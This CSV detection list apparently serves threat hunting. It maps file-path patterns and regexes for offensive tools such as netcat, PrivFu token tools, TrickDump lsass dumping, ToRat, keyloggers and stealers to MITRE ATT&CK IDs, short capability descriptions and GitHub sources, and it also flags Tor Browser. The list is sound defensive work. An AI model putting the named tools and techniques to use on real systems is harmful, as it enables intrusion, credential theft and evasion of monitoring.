"*\Tmp\netcat.exe*",".{0,1000}\\Tmp\\netcat\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19365"
"*\tmp_payload.txt*",".{0,1000}\\tmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19366"
"*\Token grabber.dll*",".{0,1000}\\Token\sgrabber\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","19367"
"*\TokenAssignor.exe*",".{0,1000}\\TokenAssignor\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19368"
"*\TokenDump.cs*",".{0,1000}\\TokenDump\.cs.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19369"
"*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19370"
"*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19371"
"*\TokenDump.sln*",".{0,1000}\\TokenDump\.sln.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19372"
"*\TokenExfiltereter.cs*",".{0,1000}\\TokenExfiltereter\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","19373"
"*\TokenFinder.py*",".{0,1000}\\TokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","19374"
"*\Token-Impersonation.ps1*",".{0,1000}\\Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19375"
"*\Token-Impersonation.ps1*",".{0,1000}\\Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","19376"
"*\TokenPlayer.cpp*",".{0,1000}\\TokenPlayer\.cpp.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19377"
"*\TokenPlayer.exe*",".{0,1000}\\TokenPlayer\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19378"
"*\TokenPlayer\TokenPlayer\*",".{0,1000}\\TokenPlayer\\TokenPlayer\\.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19379"
"*\tokenprivileges.c*",".{0,1000}\\tokenprivileges\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19380"
"*\tokenprivileges.o*",".{0,1000}\\tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19381"
"*\TokenStealing.exe*",".{0,1000}\\TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19382"
"*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19383"
"*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19384"
"*\TokenUniverse.zip*",".{0,1000}\\TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","19385"
"*\TokenUniverse\TokenUniverse.*",".{0,1000}\\TokenUniverse\\TokenUniverse\..{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","19386"
"*\Tokenvator\*",".{0,1000}\\Tokenvator\\.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","19387"
"*\toms-server\keylog.txt*",".{0,1000}\\toms\-server\\keylog\.txt.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","19388"
"*\tools\DocLnk.exe*",".{0,1000}\\tools\\DocLnk\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","19389"
"*\Tools\ResHacker.exe*",".{0,1000}\\Tools\\ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19391"
"*\tor.exe*",".{0,1000}\\tor\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19392"
"*\tor\hidden_service.*",".{0,1000}\\tor\\hidden_service\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19393"
"*\tor\onion_router.*",".{0,1000}\\tor\\onion_router\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19394"
"*\Tor\tor.exe*",".{0,1000}\\Tor\\tor\.exe.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19395"
"*\Tor\torrc*",".{0,1000}\\Tor\\torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19396"
"*\ToRat\cmd\*",".{0,1000}\\ToRat\\cmd\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19397"
"*\ToRat\keygen\*",".{0,1000}\\ToRat\\keygen\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19398"
"*\ToRat\torat_client\*",".{0,1000}\\ToRat\\torat_client\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19399"
"*\ToRat\torat_server\*",".{0,1000}\\ToRat\\torat_server\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19400"
"*\ToRat-master.zip*",".{0,1000}\\ToRat\-master\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19401"
"*\TorBrowser*",".{0,1000}\\TorBrowser.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","19402"
"*\torbrowser-install-*.exe  *",".{0,1000}\\torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19403"
"*\tor-browser-win32*.*",".{0,1000}\\tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19404"
"*\tor-browser-win64*.*",".{0,1000}\\tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19405"
"*\tor-static-windows-amd64.zip*",".{0,1000}\\tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","19406"
"*\TortoiseSVNHookScripts.cs*",".{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","19407"
"*\totalrecall.py*",".{0,1000}\\totalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19408"
"*\TotalRecall.txt*",".{0,1000}\\TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19409"
"*\TotalRecall\*_Recall_Extraction*",".{0,1000}\\TotalRecall\\.{0,1000}_Recall_Extraction.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19410"
"*\toteslegit.ps1*",".{0,1000}\\toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","19411"
"*\TrickDump.sln*",".{0,1000}\\TrickDump\.sln.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19416"
"*\TrickDump-main*",".{0,1000}\\TrickDump\-main.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19417"
"*\tricky.lnk\*",".{0,1000}\\tricky\.lnk\\.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19418"
"*\tricky.ps1*",".{0,1000}\\tricky\.ps1.{0,1000}","offensive_tool_keyword","MacroMeter","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19419"
"*\tricky.vbs*",".{0,1000}\\tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19420"
"*\tricky2.ps1*",".{0,1000}\\tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19421"
"*\triple_mine_zil_etc_aleph.bat*",".{0,1000}\\triple_mine_zil_etc_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","19422"
"*\triple_mine_zil_ethw_aleph.bat*",".{0,1000}\\triple_mine_zil_ethw_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","19423"
"*\trix-back-gen.zip*",".{0,1000}\\trix\-back\-gen\.zip.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","19424"
"*\trojan.exe*",".{0,1000}\\trojan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19425"
"*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19426"
"*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19427"
"*\trustedsec\Downloads\putty.exe*",".{0,1000}\\trustedsec\\Downloads\\putty\.exe.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","19428"
"*\TrustedWave_x64.exe*",".{0,1000}\\TrustedWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19429"
"*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19430"
"*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19431"
"*\tsh_windows_amd64.exe*",".{0,1000}\\tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19432"
"*\tshd.go*",".{0,1000}\\tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19433"
